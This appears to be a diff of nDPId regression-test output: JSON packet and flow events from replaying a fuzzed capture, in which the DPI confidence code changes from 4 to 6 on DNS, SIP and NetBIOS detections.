00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1120469940218,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469940218,"pkt":"ADBUADRWAODtAW69CABFAABIakIAAIARTQ\/AqAECwKgBAQqyADUANKY1g90BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469940218,"flow_last_seen":1120469940218,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469940218,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2738,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469940218,"flow_last_seen":1120469940218,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469940218,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2738,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1120469942221,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469942221,"pkt":"ADBUADRWAODtAW69CABFAABIakMAAIARTQ7AqAECwKgBAQqyADUANKY1g90BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":176,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469944224,"flow_last_seen":1120469944224,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469944224,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1120469944224,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469944224,"pkt":"ADBUADRWAODtAW69CABFAABIakQAAIARTQ3AqAECwKgBAQqcADUANKY1g90BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":176,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469944224,"flow_last_seen":1120469944224,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469944224,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":176,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469944224,"flow_last_seen":1120469944224,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469944224,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":1120469948230,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469948230,"pkt":"ADBUADRWAODtAW69CABFAABIakUAAIARTQzAqAECwKgBAQqyADUANKY1g90BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":178,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469956232,"flow_last_seen":1120469956232,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469956232,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2739,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1120469956232,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120469956232,"pkt":"ADBUADRWAODtAW69CABFAABEakYAAIARTQ\/AqAECwKgBAQqzADUAMLotat4AAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469956232,"flow_last_seen":1120469956232,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469956232,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2739,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469956232,"flow_last_seen":1120469956232,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469956232,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2739,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1120469956233,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120469956233,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CrMAR5ypat6AAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469956232,"flow_last_seen":1120469956233,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120469956233,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2739,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469956232,"flow_last_seen":1120469956233,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120469956233,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2739,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469956945,"flow_last_seen":1120469956945,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469956945,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2740,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1120469956945,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469956945,"pkt":"ADBUADRWAODtAW69CABFAABIakgAAIARTQnAqAECwKgBAQq0ADUANP0xLN8BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaSVzAGRrAAAhLwE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":183,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469956945,"flow_last_seen":1120469956945,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469956945,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2740,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyberci_s","num_queries":0,"num_answers":0,"reply_code":0,"query_type":25707,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":183,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469956945,"flow_last_seen":1120469956945,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469956945,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2740,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyberci_s","num_queries":0,"num_answers":0,"reply_code":0,"query_type":25707,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1120469957944,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469957944,"pkt":"ADBUADRWAODtAW69CABFAABIakkAAIARTQjAqAECwKgBAQq0ADUANP0xLN82AAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":184,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469956945,"flow_last_seen":1120469957944,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469957944,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2740,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":184,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469956945,"flow_last_seen":1120469957944,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469957944,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2740,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1120469959947,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469959947,"pkt":"ADBUADRWAODtAW69CABFAABIakoAAIARTQfAqAECwKgBAQq0ADUANP0xLN8BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":186,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2151,"global_ts_msec":1120469961950} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":186,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2151,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120469959947,"pkt":"ADBUADRWAODtAW69CGdFAABIaksAAIARTQbAqAECwKgBAQq0ADUAPP0xLN8BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":187,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469956945,"flow_last_seen":1120469965955,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469965955,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2740,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":188,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1120469572981,"flow_last_seen":1120469956406,"flow_idle_time":200000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":6064,"flow_avg_l4_payload_len":505,"midstream":0,"thread_ts_msec":1120469965955,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":187,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469956945,"flow_last_seen":1120469965955,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469965955,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2740,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":188,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1120469572981,"flow_last_seen":1120469956406,"flow_idle_time":200000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":6064,"flow_avg_l4_payload_len":505,"midstream":0,"thread_ts_msec":1120469965955,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":188,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469970215,"flow_last_seen":1120469970215,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469970215,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":8329,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":188,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1120469970215,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120469970215,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOak0AAIARTADAqAECwKgB\/wCJIIkAOluRhQoBEAABAAAAAAAAIEVGqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":191,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469973957,"flow_last_seen":1120469973957,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469973957,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2741,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1120469973957,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120469973957,"pkt":"ADBUADRWAODtAW69CABFAABEalEAAIARTQTAqAECwKgBAQq1ADUAMPFJM8AAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":191,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469973957,"flow_last_seen":1120469973957,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469973957,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2741,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":191,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469973957,"flow_last_seen":1120469973957,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469973957,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2741,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":192,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469973959,"flow_last_seen":1120469973959,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469973959,"l3_proto":"ip4","src_ip":"192.168.130.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2741,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1120469973959,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120469973959,"pkt":"YuDtAW69ADBUADRWCABFAABbAABAAEARtz7AqIIBwKgBAgA1CrUAR9PFM8CAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469973959,"flow_last_seen":1120469973959,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469973959,"l3_proto":"ip4","src_ip":"192.168.130.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2741,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469973959,"flow_last_seen":1120469973959,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469973959,"l3_proto":"ip4","src_ip":"192.168.130.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2741,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 